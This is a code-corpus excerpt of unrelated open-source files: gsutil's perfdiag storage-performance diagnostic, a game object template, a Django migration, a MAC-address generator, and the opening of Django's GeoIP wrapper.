HELP_TEXT from gslib.help_provider import HELP_TYPE from gslib.help_provider import HelpType from gslib.util import IS_LINUX from gslib.util import MakeBitsHumanReadable from gslib.util import MakeHumanReadable from gslib.util import Percentile _detailed_help_text = (""" <B>SYNOPSIS</B> gsutil perfdiag [-i in.json] [-o out.json] [-n iterations] [-c concurrency] [-s size] [-t tests] uri... <B>DESCRIPTION</B> The perfdiag command runs a suite of diagnostic tests for a given Google Storage bucket. The 'uri' parameter must name an existing bucket (e.g. gs://foo) to which the user has write permission. Several test files will be uploaded to and downloaded from this bucket. All test files will be deleted at the completion of the diagnostic if it finishes successfully. gsutil performance can be impacted by many factors at the client, server, and in-between, such as: CPU speed; available memory; the access path to the local disk; network bandwidth; contention and error rates along the path between gsutil and Google; operating system buffering configuration; and firewalls and other network elements. The perfdiag command is provided so that customers can run a known measurement suite when troubleshooting performance problems. <B>PROVIDING DIAGNOSTIC OUTPUT TO GOOGLE CLOUD STORAGE TEAM</B> If the Google Cloud Storage Team asks you to run a performance diagnostic please use the following command, and email the output file (output.json) to gs-team@google.com: gsutil perfdiag -o output.json gs://your-bucket <B>OPTIONS</B> -n Sets the number of iterations performed when downloading and uploading files during latency and throughput tests. Defaults to 5. -c Sets the level of concurrency to use while running throughput experiments. The default value of 1 will only run a single read or write operation concurrently. -s Sets the size (in bytes) of the test file used to perform read and write throughput tests. The default is 1 MiB. -t Sets the list of diagnostic tests to perform. The default is to run all diagnostic tests. Must be a comma-separated list containing one or more of the following: lat: Runs N iterations (set with -n) of writing the file, retrieving its metadata, reading the file, and deleting the file. Records the latency of each operation. rthru: Runs N (set with -n) read operations, with at most C (set with -c) reads outstanding at any given time. wthru: Runs N (set with -n) write operations, with at most C (set with -c) writes outstanding at any given time. -o Writes the results of the diagnostic to an output file. The output is a JSON file containing system information and performance diagnostic results. The file can be read and reported later using the -i option. -i Reads the JSON output file created using the -o command and prints a formatted description of the results. <B>NOTE</B> The perfdiag command collects system information. It collects your IP address, executes DNS queries to Google servers and collects the results, and collects network statistics information from the output of netstat -s. None of this information will be sent to Google unless you choose to send it. """) class PerfDiagCommand(Command): """Implementation of gsutil perfdiag command.""" # Command specification (processed by parent class). command_spec = { # Name of command. COMMAND_NAME: 'perfdiag', # List of command name aliases. COMMAND_NAME_ALIASES: ['diag', 'diagnostic', 'perf', 'performance'], # Min number of args required by this command. MIN_ARGS: 0, # Max number of args required by this command, or NO_MAX. MAX_ARGS: 1, # Getopt-style string specifying acceptable sub args. SUPPORTED_SUB_ARGS: 'n:c:s:t:i:o:', # True if file URIs acceptable for this command. FILE_URIS_OK: False, # True if provider-only URIs acceptable for this command. PROVIDER_URIS_OK: False, # Index in args of first URI arg. URIS_START_ARG: 0, # True if must configure gsutil before running command. CONFIG_REQUIRED: True, } help_spec = { # Name of command or auxiliary help info for which this help applies. HELP_NAME: 'perfdiag', # List of help name aliases. HELP_NAME_ALIASES: [], # Type of help: HELP_TYPE: HelpType.COMMAND_HELP, # One line summary of this help. HELP_ONE_LINE_SUMMARY: 'Run performance diagnostic', # The full help text. HELP_TEXT: _detailed_help_text, } # Byte sizes to use for testing files. # TODO: Consider letting the user specify these sizes with a configuration # parameter. test_file_sizes = ( 0, # 0 bytes 1024, # 1 KB 102400, # 100 KB 1048576, # 1MB ) # List of all diagnostic tests. ALL_DIAG_TESTS = ('rthru', 'wthru', 'lat') # Google Cloud Storage API endpoint host. GOOGLE_API_HOST = boto.gs.connection.GSConnection.DefaultHost def _WindowedExec(self, cmd, n, w, raise_on_error=True): """Executes a command n times with a window size of w. Up to w instances of the command will be executed and left outstanding at a time until n instances of the command have completed. Args: cmd: List containing the command to execute. n: Number of times the command will be executed. w: Window size of outstanding commands being executed. raise_on_error: See _Exec. Raises: Exception: If raise_on_error is set to True and any process exits with a non-zero return code. """ if self.debug: print 'Running command:', cmd devnull_f = open(os.devnull, 'w') num_finished = 0 running = [] while len(running) or num_finished < n: # Fires off new commands that can be executed. while len(running) < w and num_finished + len(running) < n: print 'Starting concurrent command: %s' % (' '.join(cmd)) p = subprocess.Popen(cmd, stdout=devnull_f, stderr=devnull_f) running.append(p) # Checks for finished commands. prev_running = running running = [] for p in prev_running: retcode = p.poll() if retcode is None: running.append(p) elif raise_on_error and retcode: raise CommandException("Received non-zero return code (%d) from " "subprocess '%s'." % (retcode, ' '.join(cmd))) else: num_finished += 1 def _Exec(self, cmd, raise_on_error=True, return_output=False, mute_stderr=False): """Executes a command in a subprocess. Args: cmd: List containing the command to execute. raise_on_error: Whether or not to raise an exception when a process exits with a non-zero return code. return_output: If set to True, the return value of the function is the stdout of the process. mute_stderr: If set to True, the stderr of the process is not printed to the console. Returns: The return code of the process or the stdout if return_output is set. Raises: Exception: If raise_on_error is set to True and any process exits with a non-zero return code. """ if self.debug: print 'Running command:', cmd stderr = subprocess.PIPE if mute_stderr else None p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=stderr) (stdoutdata, stderrdata) = p.communicate() if raise_on_error and p.returncode: raise CommandException("Received non-zero return code (%d) from " "subprocess '%s'." % (p.returncode, ' '.join(cmd))) return stdoutdata if return_output else p.returncode def _GsUtil(self, cmd, raise_on_error=True, return_output=False, mute_stderr=False): """Executes a gsutil command in a subprocess. Args: cmd: A list containing the arguments to the gsutil program, e.g. ['ls', 'gs://foo']. raise_on_error: see _Exec. return_output: see _Exec. mute_stderr: see _Exec. Returns: The return code of the process or the stdout if return_output is set. """ cmd = self.gsutil_exec_list + cmd return self._Exec(cmd, raise_on_error=raise_on_error, return_output=return_output, mute_stderr=mute_stderr) def _SetUp(self): """Performs setup operations needed before diagnostics can be run.""" # Stores test result data. self.results = {} # List of test files in a temporary location on disk for latency ops. self.latency_files = [] # Maps each test file path to its size in bytes. self.file_sizes = {} # Maps each test file to its contents as a string. self.file_contents = {} def _MakeFile(file_size): """Creates a temporary file of the given size and returns its path.""" fd, fpath = tempfile.mkstemp(suffix='.bin', prefix='gsutil_test_file', text=False) self.file_sizes[fpath] = file_size f = os.fdopen(fd, 'wb') f.write(os.urandom(file_size)) f.close() f = open(fpath, 'rb') self.file_contents[fpath] = f.read() f.close() return fpath # Create files for latency tests. for file_size in self.test_file_sizes: fpath = _MakeFile(file_size) self.latency_files.append(fpath) # Local file on disk for write throughput tests. self.thru_local_file = _MakeFile(self.thru_filesize) # Remote file to write/read from during throughput tests. self.thru_remote_file = (str(self.bucket_uri) + os.path.basename(self.thru_local_file)) def _TearDown(self): """Performs operations to clean things up after performing diagnostics.""" for fpath in self.latency_files + [self.thru_local_file]: try: os.remove(fpath) except OSError: pass self._GsUtil(['rm', self.thru_remote_file], raise_on_error=False, mute_stderr=True) @contextlib.contextmanager def _Time(self, key, bucket): """A context manager that measures time. A context manager that prints a status message before and after executing the inner command and times how long the inner command takes. Keeps track of the timing, aggregated by the given key. Args: key: The key to insert the timing value into a dictionary bucket. bucket: A dictionary to place the timing value in. Yields: For the context manager. """ print key, 'starting...' t0 = time.time() yield t1 = time.time() bucket[key].append(t1 - t0) print key, 'done.' def _RunLatencyTests(self): """Runs latency tests.""" # Stores timing information for each category of operation. self.results['latency'] = defaultdict(list) for i in range(self.num_iterations): print print 'Running latency iteration %d...' % (i+1) for fpath in self.latency_files: basename = os.path.basename(fpath) gsbucket = str(self.bucket_uri) gsuri = gsbucket + basename file_size = self.file_sizes[fpath] readable_file_size = MakeHumanReadable(file_size) print print ("File of size %(size)s located on disk at '%(fpath)s' being " "diagnosed in the cloud at '%(gsuri)s'." % {'size': readable_file_size, 'fpath': fpath, 'gsuri': gsuri}) k = self.bucket.key_class(self.bucket) k.key = basename with self._Time('UPLOAD_%d' % file_size, self.results['latency']): k.set_contents_from_string(self.file_contents[fpath]) with self._Time('METADATA_%d' % file_size, self.results['latency']): k.exists() with self._Time('DOWNLOAD_%d' % file_size, self.results['latency']): k.get_contents_as_string() with self._Time('DELETE_%d' % file_size, self.results['latency']): k.delete() def _RunReadThruTests(self): """Runs read throughput tests.""" self.results['read_throughput'] = {'file_size': self.thru_filesize, 'num_times': self.num_iterations, 'concurrency': self.concurrency} # Copy the file to remote location before reading. self._GsUtil(['cp', self.thru_local_file, self.thru_remote_file]) if self.concurrency == 1: k = self.bucket.key_class(self.bucket) k.key = os.path.basename(self.thru_local_file) # Warm up the TCP connection by transferring a couple times first. for i in range(2): k.get_contents_as_string() t0 = time.time() for i in range(self.num_iterations): k.get_contents_as_string() t1 = time.time() else: cmd = self.gsutil_exec_list + ['cp', self.thru_remote_file, os.devnull] t0 = time.time() self._WindowedExec(cmd, self.num_iterations, self.concurrency) t1 = time.time() time_took = t1 - t0 total_bytes_copied = self.thru_filesize * self.num_iterations bytes_per_second = total_bytes_copied / time_took self.results['read_throughput']['time_took'] = time_took self.results['read_throughput']['total_bytes_copied'] = total_bytes_copied self.results['read_throughput']['bytes_per_second'] = bytes_per_second def _RunWriteThruTests(self): """Runs write throughput tests.""" self.results['write_throughput'] = {'file_size': self.thru_filesize, 'num_copies': self.num_iterations, 'concurrency': self.concurrency} if self.concurrency == 1: k = self.bucket.key_class(self.bucket) k.key = os.path.basename(self.thru_local_file) # Warm up the TCP connection by transferring a couple times first. for i in range(2): k.set_contents_from_string(self.file_contents[self.thru_local_file]) t0 = time.time() for i in range(self.num_iterations): k.set_contents_from_string(self.file_contents[self.thru_local_file]) t1 = time.time() else: cmd = self.gsutil_exec_list + ['cp', self.thru_local_file, self.thru_remote_file] t0 = time.time() self._WindowedExec(cmd, self.num_iterations, self.concurrency) t1 = time.time() time_took = t1 - t0 total_bytes_copied = self.thru_filesize * self.num_iterations bytes_per_second = total_bytes_copied / time_took self.results['write_throughput']['time_took'] = time_took self.results['write_throughput']['total_bytes_copied'] = total_bytes_copied self.results['write_throughput']['bytes_per_second'] = bytes_per_second def _GetDiskCounters(self): """Retrieves disk I/O statistics for all disks. Adapted from the psutil module's psutil._pslinux.disk_io_counters: http://code.google.com/p/psutil/source/browse/trunk/psutil/_pslinux.py Originally distributed under under a BSD license. Original Copyright (c) 2009, Jay Loden, Dave Daeschler, Giampaolo Rodola. Returns: A dictionary containing disk names mapped to the disk counters from /disk/diskstats. """ # iostat documentation states that sectors are equivalent with blocks and # have a size of 512 bytes since 2.4 kernels. This value is needed to # calculate the amount of disk I/O in bytes. sector_size = 512 partitions = [] with open('/proc/partitions', 'r') as f: lines = f.readlines()[2:] for line in lines: _, _, _, name = line.split() if name[-1].isdigit(): partitions.append(name) retdict = {} with open('/proc/diskstats', 'r') as f: for line in f: values = line.split()[:11] _, _, name, reads, _, rbytes, rtime, writes, _, wbytes, wtime = values if name in partitions: rbytes = int(rbytes) * sector_size wbytes = int(wbytes) * sector_size reads = int(reads) writes = int(writes) rtime = int(rtime) wtime = int(wtime) retdict[name] = (reads, writes, rbytes, wbytes, rtime, wtime) return retdict def _GetTcpStats(self): """Tries to parse out TCP packet information from netstat output. Returns: A dictionary containing TCP information """ # netstat return code is non-zero for -s on Linux, so don't raise on error. netstat_output = self._Exec(['netstat', '-s'], return_output=True, raise_on_error=False) netstat_output = netstat_output.strip().lower() found_tcp = False tcp_retransmit = None tcp_received = None tcp_sent = None for line in netstat_output.split('\n'): # Header for TCP section is "Tcp:" in Linux/Mac and # "TCP Statistics for" in Windows. if 'tcp:' in line or 'tcp statistics' in line: found_tcp = True # Linux == "segments retransmited" (sic), Mac == "retransmit timeouts" # Windows == "segments retransmitted". if (found_tcp and tcp_retransmit is None and ('segments retransmited' in line or 'retransmit timeouts' in line or 'segments retransmitted' in line)): tcp_retransmit = ''.join(c for c in line if c in string.digits) # Linux+Windows == "segments received", Mac == "packets received". if (found_tcp and tcp_received is None and ('segments received' in line or 'packets received' in line)): tcp_received = ''.join(c for c in line if c in string.digits) # Linux == "segments send out" (sic), Mac+Windows == "packets sent". if (found_tcp and tcp_sent is None and ('segments send out' in line or 'packets sent' in line or 'segments sent' in line)): tcp_sent = ''.join(c for c in line if c in string.digits) result = {} try: result['tcp_retransmit'] = int(tcp_retransmit) result['tcp_received'] = int(tcp_received) result['tcp_sent'] = int(tcp_sent) except (ValueError, TypeError): result['tcp_retransmit'] = None result['tcp_received'] = None result['tcp_sent'] = None return result def _CollectSysInfo(self): """Collects system information.""" sysinfo = {} # Get the local IP address from socket lib. sysinfo['ip_address'] = socket.gethostbyname(socket.gethostname()) # Record the temporary directory used since it can affect performance, e.g. # when on a networked filesystem. sysinfo['tempdir'] = tempfile.gettempdir() # Produces an RFC 2822 compliant GMT timestamp. sysinfo['gmt_timestamp'] = time.strftime('%a, %d %b %Y %H:%M:%S +0000', time.gmtime()) # Execute a CNAME lookup on Google DNS to find what Google server # it's routing to. cmd = ['nslookup', '-type=CNAME', self.GOOGLE_API_HOST] nslookup_cname_output = self._Exec(cmd, return_output=True) m = re.search(r' = (?P<googserv>[^.]+)\.', nslookup_cname_output) sysinfo['googserv_route'] = m.group('googserv') if m else None # Look up IP addresses for Google Server. (hostname, aliaslist, ipaddrlist) = socket.gethostbyname_ex( self.GOOGLE_API_HOST) sysinfo['googserv_ips'] = ipaddrlist # Reverse lookup the hostnames for the Google Server IPs. sysinfo['googserv_hostnames'] = [] for googserv_ip in ipaddrlist: (hostname, aliaslist, ipaddrlist) = socket.gethostbyaddr(googserv_ip) sysinfo['googserv_hostnames'].append(hostname) # Query o-o to find out what the Google DNS thinks is the user's IP. cmd = ['nslookup', '-type=TXT', 'o-o.myaddr.google.com.'] nslookup_txt_output = self._Exec(cmd, return_output=True) m = re.search(r'text\s+=\s+"(?P<dnsip>[\.\d]+)"', nslookup_txt_output) sysinfo['dns_o-o_ip'] = m.group('dnsip') if m else None # Try and find the number of CPUs in the system if available. try: sysinfo['cpu_count'] = multiprocessing.cpu_count() except NotImplementedError: sysinfo['cpu_count'] = None # For *nix platforms, obtain the CPU load. try: sysinfo['load_avg'] = list(os.getloadavg()) except (AttributeError, OSError): sysinfo['load_avg'] = None # Try and collect memory information from /proc/meminfo if possible. mem_total = None mem_free = None mem_buffers = None mem_cached = None try: with open('/proc/meminfo', 'r') as f: for line in f: if line.startswith('MemTotal'): mem_total = (int(''.join(c for c in line if c in string.digits)) * 1000) elif line.startswith('MemFree'): mem_free = (int(''.join(c for c in line if c in string.digits)) * 1000) elif line.startswith('Buffers'): mem_buffers = (int(''.join(c for c in line if c in string.digits)) * 1000) elif line.startswith('Cached'): mem_cached = (int(''.join(c for c in line if c in string.digits)) * 1000) except (IOError, ValueError): pass sysinfo['meminfo'] = {'mem_total': mem_total, 'mem_free': mem_free, 'mem_buffers': mem_buffers, 'mem_cached': mem_cached} # Get configuration attributes from config module. sysinfo['gsutil_config'] = {} for attr in dir(config): attr_value = getattr(config, attr) # Filter out multiline strings that are not useful. if attr.isupper() and not (isinstance(attr_value, basestring) and '\n' in attr_value): sysinfo['gsutil_config'][attr] = attr_value self.results['sysinfo'] = sysinfo def _DisplayStats(self, trials): """Prints out mean, standard deviation, median, and 90th percentile.""" n = len(trials) mean = float(sum(trials)) / n stdev = math.sqrt(sum((x - mean)**2 for x in trials) / n) print str(n).rjust(6), '', print ('%.1f' % (mean * 1000)).rjust(9), '', print ('%.1f' % (stdev * 1000)).rjust(12), '', print ('%.1f' % (Percentile(trials, 0.5) * 1000)).rjust(11), '', print ('%.1f' % (Percentile(trials, 0.9) * 1000)).rjust(11), '' def _DisplayResults(self): """Displays results collected from diagnostic run.""" print print '=' * 78 print 'DIAGNOSTIC RESULTS'.center(78) print '=' * 78 if 'latency' in self.results: print print '-' * 78 print 'Latency'.center(78) print '-' * 78 print ('Operation Size Trials Mean (ms) Std Dev (ms) ' 'Median (ms) 90th % (ms)') print ('========= ========= ====== ========= ============ ' '=========== ===========') for key in sorted(self.results['latency']): trials = sorted(self.results['latency'][key]) op, numbytes = key.split('_') numbytes = int(numbytes) if op == 'METADATA': print 'Metadata'.rjust(9), '', print MakeHumanReadable(numbytes).rjust(9), '', self._DisplayStats(trials) if op == 'DOWNLOAD': print 'Download'.rjust(9), '', print MakeHumanReadable(numbytes).rjust(9), '', self._DisplayStats(trials) if op == 'UPLOAD': print 'Upload'.rjust(9), '', print MakeHumanReadable(numbytes).rjust(9), '', self._DisplayStats(trials) if op == 'DELETE': print 'Delete'.rjust(9), '', print MakeHumanReadable(numbytes).rjust(9), '', self._DisplayStats(trials) if 'write_throughput' in self.results: print print '-' * 78 print 'Write Throughput'.center(78) print '-' * 78 write_thru = self.results['write_throughput'] print 'Copied a %s file %d times for a total transfer size of %s.' % ( MakeHumanReadable(write_thru['file_size']), write_thru['num_copies'], MakeHumanReadable(write_thru['total_bytes_copied'])) print 'Write throughput: %s/s.' % ( MakeBitsHumanReadable(write_thru['bytes_per_second'] * 8)) if 'read_throughput' in self.results: print print '-' * 78 print 'Read Throughput'.center(78) print '-' * 78 read_thru = self.results['read_throughput'] print 'Copied a %s file %d times for a total transfer size of %s.' % ( MakeHumanReadable(read_thru['file_size']), read_thru['num_times'], MakeHumanReadable(read_thru['total_bytes_copied'])) print 'Read throughput: %s/s.' % ( MakeBitsHumanReadable(read_thru['bytes_per_second'] * 8)) if 'sysinfo' in self.results: print print '-' * 78 print 'System Information'.center(78) print '-' * 78 info = self.results['sysinfo'] print 'IP Address: \n %s' % info['ip_address'] print 'Temporary Directory: \n %s' % info['tempdir'] print 'Bucket URI: \n %s' % self.results['bucket_uri'] if 'gmt_timestamp' in info: ts_string = info['gmt_timestamp'] timetuple = None try: # Convert RFC 2822 string to Linux timestamp. timetuple = time.strptime(ts_string, '%a, %d %b %Y %H:%M:%S +0000') except ValueError: pass if timetuple: # Converts the GMT time tuple to local Linux timestamp. localtime = calendar.timegm(timetuple) localdt = datetime.datetime.fromtimestamp(localtime) print 'Measurement time: \n %s' % localdt.strftime( '%Y-%m-%d %I-%M-%S %p %Z') print 'Google Server: \n %s' % info['googserv_route'] print ('Google Server IP Addresses: \n %s' % ('\n '.join(info['googserv_ips']))) print ('Google Server Hostnames: \n %s' % ('\n '.join(info['googserv_hostnames']))) print 'Google DNS thinks your IP is: \n %s' % info['dns_o-o_ip'] print 'CPU Count: \n %s' % info['cpu_count'] print 'CPU Load Average: \n %s' % info['load_avg'] try: print ('Total Memory: \n %s' % MakeHumanReadable(info['meminfo']['mem_total'])) # Free memory is really MemFree + Buffers + Cached. print 'Free Memory: \n %s' % MakeHumanReadable( info['meminfo']['mem_free'] + info['meminfo']['mem_buffers'] + info['meminfo']['mem_cached']) except TypeError: pass netstat_after = info['netstat_end'] netstat_before = info['netstat_start'] for tcp_type in ('sent', 'received', 'retransmit'): try: delta = (netstat_after['tcp_%s' % tcp_type] - netstat_before['tcp_%s' % tcp_type]) print 'TCP segments %s during test:\n %d' % (tcp_type, delta) except TypeError: pass if 'disk_counters_end' in info and 'disk_counters_start' in info: print 'Disk Counter Deltas:\n', disk_after = info['disk_counters_end'] disk_before = info['disk_counters_start'] print '', 'disk'.rjust(6), for colname in ['reads', 'writes', 'rbytes', 'wbytes', 'rtime', 'wtime']: print colname.rjust(8), print for diskname in sorted(disk_after): before = disk_before[diskname] after = disk_after[diskname] (reads1, writes1, rbytes1, wbytes1, rtime1, wtime1) = before (reads2, writes2, rbytes2, wbytes2, rtime2, wtime2) = after print '', diskname.rjust(6), deltas = [reads2-reads1, writes2-writes1, rbytes2-rbytes1, wbytes2-wbytes1, rtime2-rtime1, wtime2-wtime1] for delta in deltas: print str(delta).rjust(8), print if self.output_file: with open(self.output_file, 'w') as f: json.dump(self.results, f, indent=2) print print "Output file written to '%s'." % self.output_file print def _ParsePositiveInteger(self, val, msg): """Tries to convert val argument to a positive integer. Args: val: The value (as a string) to convert to a positive integer. msg: The error message to place in the CommandException on an error. Returns: A valid positive integer. Raises: CommandException: If the supplied value is not a valid positive integer. """ try: val = int(val) if val < 1: raise CommandException(msg) return val except ValueError: raise CommandException(msg) def _ParseArgs(self): """Parses arguments for perfdiag command.""" # From -n. self.num_iterations = 5 # From -c. self.concurrency = 1 # From -s. self.thru_filesize = 1048576 # From -t. self.diag_tests = self.ALL_DIAG_TESTS # From -o. self.output_file = None # From -i. self.input_file = None if self.sub_opts: for o, a in self.sub_opts: if o == '-n': self.num_iterations = self._ParsePositiveInteger( a, 'The -n parameter must be a positive integer.') if o == '-c': self.concurrency = self._ParsePositiveInteger( a, 'The -c parameter must be a positive integer.') if o == '-s': self.thru_filesize = self._ParsePositiveInteger( a, 'The -s parameter must be a positive integer.') if o == '-t': self.diag_tests = [] for test_name in a.strip().split(','): if test_name.lower() not in self.ALL_DIAG_TESTS: raise CommandException("List of test names (-t) contains invalid " "test name '%s'." % test_name) self.diag_tests.append(test_name) if o == '-o': self.output_file = os.path.abspath(a) if o == '-i': self.input_file = os.path.abspath(a) if not os.path.isfile(self.input_file): raise CommandException("Invalid input file (-i): '%s'." % a) try: with open(self.input_file, 'r') as f: self.results = json.load(f) print "Read input file: '%s'." % self.input_file except ValueError: raise CommandException("Could not decode input file (-i): '%s'." % a) return if not self.args: raise CommandException('Wrong number of arguments for "perfdiag" ' 'command.') self.bucket_uri = self.suri_builder.StorageUri(self.args[0]) if not self.bucket_uri.names_bucket(): raise CommandException('The perfdiag command requires a URI that ' 'specifies a bucket.\n"%s" is not ' 'valid.' % self.bucket_uri) self.bucket = self.bucket_uri.get_bucket() # Command entry point. def RunCommand(self): """Called by gsutil when the command is being invoked.""" self._ParseArgs() if self.input_file: self._DisplayResults() return 0 print 'Number of iterations to run: %d' % self.num_iterations print 'Base bucket URI: %s' % self.bucket_uri print 'Concurrency level: %d' % self.concurrency print 'Throughput file size: %s' % MakeHumanReadable(self.thru_filesize) print 'Diagnostics to run: %s' % (', '.join(self.diag_tests)) try: self._SetUp() # Collect generic system info. self._CollectSysInfo() # Collect netstat info and disk counters before tests (and again later). self.results['sysinfo']['netstat_start'] = self._GetTcpStats() if IS_LINUX: self.results['sysinfo']['disk_counters_start'] = self._GetDiskCounters() # Record bucket URI. self.results['bucket_uri'] = str(self.bucket_uri) if 'lat' in self.diag_tests: self._RunLatencyTests() if 'rthru' in self.diag_tests: self._RunReadThruTests() if 'wthru' in self.diag_tests: self._RunWriteThruTests() # Collect netstat info and disk counters after tests. self.results['sysinfo']['netstat_end'] = self._GetTcpStats() if IS_LINUX: self.results['sysinfo']['disk_counters_end'] = self._GetDiskCounters() self._DisplayResults() finally: self._TearDown() return 0
anhstudios/swganh
refs/heads/develop
data/scripts/templates/object/tangible/furniture/all/shared_bestine_quest_statue.py
2
#### NOTICE: THIS FILE IS AUTOGENERATED #### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY #### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES from swgpy.object import * def create(kernel): result = Tangible() result.template = "object/tangible/furniture/all/shared_bestine_quest_statue.iff" result.attribute_template_id = 6 result.stfName("frn_n","bestine_quest_statue") #### BEGIN MODIFICATIONS #### #### END MODIFICATIONS #### return result
openstates/openstates.org
refs/heads/develop
people_admin/migrations/0002_deltaset_persondelta.py
1
# Generated by Django 2.2.16 on 2021-03-02 16:46 from django.conf import settings import django.contrib.postgres.fields.jsonb from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ("data", "0028_auto_20201022_1642"), ("people_admin", "0001_initial"), ] operations = [ migrations.CreateModel( name="DeltaSet", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("name", models.CharField(max_length=200)), ("pr_url", models.URLField(blank=True, default="")), ("created_at", models.DateTimeField(auto_now_add=True)), ( "created_by", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="delta_sets", to=settings.AUTH_USER_MODEL, ), ), ], ), migrations.CreateModel( name="PersonDelta", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("data_changes", django.contrib.postgres.fields.jsonb.JSONField()), ( "delta_set", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="person_deltas", to="people_admin.DeltaSet", ), ), ( "person", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="data.Person" ), ), ], ), ]
rdobson/auto-cert-kit
refs/heads/master
acktools/net/__init__.py
2
import random def generate_mac(): """ This function will generate a random MAC. The function generates a MAC with the Xensource, Inc. OUI '00:16:3E'. Care should be taken to ensure duplicates are not used. """ mac = [ 0x00, 0x16, 0x3e, random.randint(0x00, 0x7f), random.randint(0x00, 0xff), random.randint(0x00, 0xff) ] return ':'.join(map(lambda x: "%02x" % x, mac))
Shrews/PyGerrit
refs/heads/master
webapp/django/contrib/gis/utils/geoip.py
7
""" This module houses the GeoIP object, a ctypes wrapper for the MaxMind GeoIP(R) C API (http://www.maxmind.com/app/c). This is an alternative to the GPL licensed Python GeoIP interface provided by MaxMind. GeoIP(R) is a registered trademark of MaxMind, LLC of Boston, Massachusetts. For IP-based geolocation, this module requires the GeoLite Country and City datasets, in binary format (CSV will not work!). The datasets may be downloaded from MaxMind at http://www.maxmind.com/download/geoip/database/. Grab GeoIP.dat.gz and GeoLiteCity.dat.gz, and unzip them in the directory corresponding to settings.GEOIP_PATH. See the GeoIP docstring and examples below for more details. TODO: Verify compatibility with Windows. Example: >>> from django.contrib.gis.utils import GeoIP >>> g = GeoIP() >>> g.country('google.com') {'country_code': 'US', 'country_name': 'United States'} >>> g.city('72.14.207.99') {'area_code': 650, 'city': 'Mountain View', 'country_code': 'US', 'country_code3': 'USA', 'country_name': 'United States', 'dma_code': 807, 'latitude': 37.419200897216797, 'longitude': -122.05740356445312, 'postal_code': '94043', 'region': 'CA'} >>> g.lat_lon('salon.com') (37.789798736572266, -122.39420318603516) >>> g.lon_lat('uh.edu') (-95.415199279785156, 29.77549934387207) >>> g.geos('24.124.1.80').wkt 'POINT (-95.2087020874023438 39.0392990112304688)' """ import os, re from ctypes import c_char_p, c_float, c_int, Structure, CDLL, POINTER from ctypes.util import find_library from django.conf import settings if not settings._target: settings.configure() # Creating the settings dictionary with any settings, if needed. GEOIP_SETTINGS = dict((key, getattr(settings, key)) for key in ('GEOIP_PATH', 'GEOIP_LIBRARY_PATH', 'GEOIP_COUNTRY', 'GEOIP_CITY') if hasattr(settings, key)) lib_path = GEOIP_SETTINGS.get('GEOIP_LIBRARY_PATH', None) # GeoIP Exception class. class GeoIPException(Exception): pass # The shared library for the GeoIP C API. May be downloaded # from http://www.maxmind.com/download/geoip/api/c/ if lib_path: lib_name = None else: # TODO: Is this really the library name for Windows? lib_name = 'GeoIP' # Getting the path to the GeoIP library. if lib_name: lib_path = find_library(lib_name) if lib_path is None: raise GeoIPException('Could not find the GeoIP library (tried "%s"). ' 'Try setting GEOIP_LIBRARY_PATH in your settings.' % lib_name) lgeoip = CDLL(lib_path) # Regular expressions for recognizing IP addresses and the GeoIP # free database editions. ipregex = re.compile(r'^(?P<w>\d\d?\d?)\.(?P<x>\d\d?\d?)\.(?P<y>\d\d?\d?)\.(?P<z>\d\d?\d?)$') free_regex = re.compile(r'^GEO-\d{3}FREE') lite_regex = re.compile(r'^GEO-\d{3}LITE') #### GeoIP C Structure definitions #### class GeoIPRecord(Structure): _fields_ = [('country_code', c_char_p), ('country_code3', c_char_p), ('country_name', c_char_p), ('region', c_char_p), ('city', c_char_p), ('postal_code', c_char_p), ('latitude', c_float), ('longitude', c_float), ('dma_code', c_int), ('area_code', c_int), ] class GeoIPTag(Structure): pass #### ctypes function prototypes #### RECTYPE = POINTER(GeoIPRecord) DBTYPE = POINTER(GeoIPTag) # For retrieving records by name or address. def record_output(func): func.restype = RECTYPE return func rec_by_addr = record_output(lgeoip.GeoIP_record_by_addr) rec_by_name = record_output(lgeoip.GeoIP_record_by_name) # For opening up GeoIP databases. geoip_open = lgeoip.GeoIP_open geoip_open.restype = DBTYPE # String output routines. def string_output(func): func.restype = c_char_p return func geoip_dbinfo = string_output(lgeoip.GeoIP_database_info) cntry_code_by_addr = string_output(lgeoip.GeoIP_country_code_by_addr) cntry_code_by_name = string_output(lgeoip.GeoIP_country_code_by_name) cntry_name_by_addr = string_output(lgeoip.GeoIP_country_name_by_addr) cntry_name_by_name = string_output(lgeoip.GeoIP_country_name_by_name) #### GeoIP class #### class GeoIP(object): # The flags for GeoIP memory caching. # GEOIP_STANDARD - read database from filesystem, uses least memory. # # GEOIP_MEMORY_CACHE - load database into memory, faster performance # but uses more memory # # GEOIP_CHECK_CACHE - check for updated database. If database has been updated, # reload filehandle and/or memory cache. # # GEOIP_INDEX_CACHE - just cache # the most frequently accessed index portion of the database, resulting # in faster lookups than GEOIP_STANDARD, but less memory usage than # GEOIP_MEMORY_CACHE - useful for larger databases such as # GeoIP Organization and GeoIP City. Note, for GeoIP Country, Region # and Netspeed databases, GEOIP_INDEX_CACHE is equivalent to GEOIP_MEMORY_CACHE # GEOIP_STANDARD = 0 GEOIP_MEMORY_CACHE = 1 GEOIP_CHECK_CACHE = 2 GEOIP_INDEX_CACHE = 4 cache_options = dict((opt, None) for opt in (0, 1, 2, 4)) def __init__(self, path=None, cache=0, country=None, city=None): """ Initializes the GeoIP object, no parameters are required to use default settings. Keyword arguments may be passed in to customize the locations of the GeoIP data sets. * path: Base directory to where GeoIP data is located or the full path to where the city or country data files (*.dat) are located. Assumes that both the city and country data sets are located in this directory; overrides the GEOIP_PATH settings attribute. * cache: The cache settings when opening up the GeoIP datasets, and may be an integer in (0, 1, 2, 4) corresponding to the GEOIP_STANDARD, GEOIP_MEMORY_CACHE, GEOIP_CHECK_CACHE, and GEOIP_INDEX_CACHE `GeoIPOptions` C API settings, respectively. Defaults to 0, meaning that the data is read from the disk. * country: The name of the GeoIP country data file. Defaults to 'GeoIP.dat'; overrides the GEOIP_COUNTRY settings attribute. * city: The name of the GeoIP city data 